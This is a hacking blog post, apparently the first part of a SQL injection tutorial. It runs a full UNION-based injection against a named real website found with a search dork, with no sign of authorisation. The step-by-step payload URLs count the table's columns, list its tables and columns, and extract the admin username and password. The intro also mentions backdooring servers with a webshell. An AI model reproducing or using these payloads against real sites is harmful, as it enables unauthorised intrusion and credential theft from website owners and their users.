HaxWorm Security - Hacking,Cracking & Pentesting

Hello My Dear Readers :)

I Recently wrote An Article About How to Backdoor a server Using Weevely Stealth WebShell.

Now i Thought to Share SQL Injection tutorials Here with You Guys. and I Divided it Into 3 Parts.

1. Basic Sql Injection

2. Waf Bypassing

3. Advanced Sql Injjection

And what are Requirements.

Patience to Playe With things and A Clever Brain ofcourse :D

Lets Start our Part 1 Now.

First of all You Guyz have to find A Vulnerable site For SQL Injection. For Which You Can Use Any dork. a famous dork is Here.

inurl:.php?id= site:com

and You'll Get A Huge List of sites, Lets Say I Got a site.

http://www.dakshindare.co.in/official.php?id=3

Now What I have To Do is to check if its vulnerable or No , Just Add a String ( ' ) after the Parameter ID. It Should Look Like This.

 http://www.dakshindare.co.in/official.php?id=3'

and If You see An SQL ERROR on the Page or Any Change in Page Then This Site is Vulnerable to SQl Injection.

Here in My Case i Got error.

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/dakshind/public_html/official.php on line 48

its Intresting :D , Now Lets Try to Check its Columns. To Do it You Have to Simple Add .

order by x--

command , Here "x" Could Be any Number. and We Have to check the Url and Keep Adding x+1 untill we Get error again.

In My Case it is Like This.

• http://www.dakshindare.co.in/official.php?id=3 order by 1-- (No Error) 

Now here x=1 so Keep Ading 1 number in it and What i see That I Get Error On this Url.

• http://www.dakshindare.co.in/official.php?id=3 order by 7-- (Error)

 So This site Have Now 6 Columns. what We Have to do is Now Use UniOn SeleCt and Add a Hiphen ( - ) infront of ParaMeter Number. In My Case.

http://www.dakshindare.co.in/official.php?id=-3 union select 1,2,3,4,5,6--

 it Should Show Some Type Of Number now , In My Case Its showing.





 Now 2,3 and 4 are InjectAble.

so What I'll do just Add

group_concat(table_name) , from information_schema.tables where table_schema=database()

In My Case it Will Be.

 http://www.dakshindare.co.in/official.php?id=3 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--

and Result is.


Now I Want to Know Admin ID and PASSWORD. So I'll Use Admin Table To Fetch its Data. Command Should Look Like This.

http://www.dakshindare.co.in/official.php?id=3 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

and It'll Fetch out Data From ADMIN table. Now Its Time to Get Data From Admin Table. Suppose its

•     username
•     password

        http://www.dakshindare.co.in/official.php?id=3 union select 1,group_concat(username,0x3a,password),3,4,5,6 from admin--

Viola :D You Can see Admin Username & Password On The Page. So Guys This is A Simplest and Basic Tutorial on How a Sql Injection Actually Works.

Hope You Will Like This Article , Please Share Us To Increase us aswell, also In Case Of You Don't Understand What I've Posted then simple Comment Down Your Problwm and We'll Get Back to You as soon as possible :)

This Post Is Written By Muhammad Adeel , He is a Security Researcher And Programmer Of C++,C,Python,Ruby,HTML and A Bit More ;)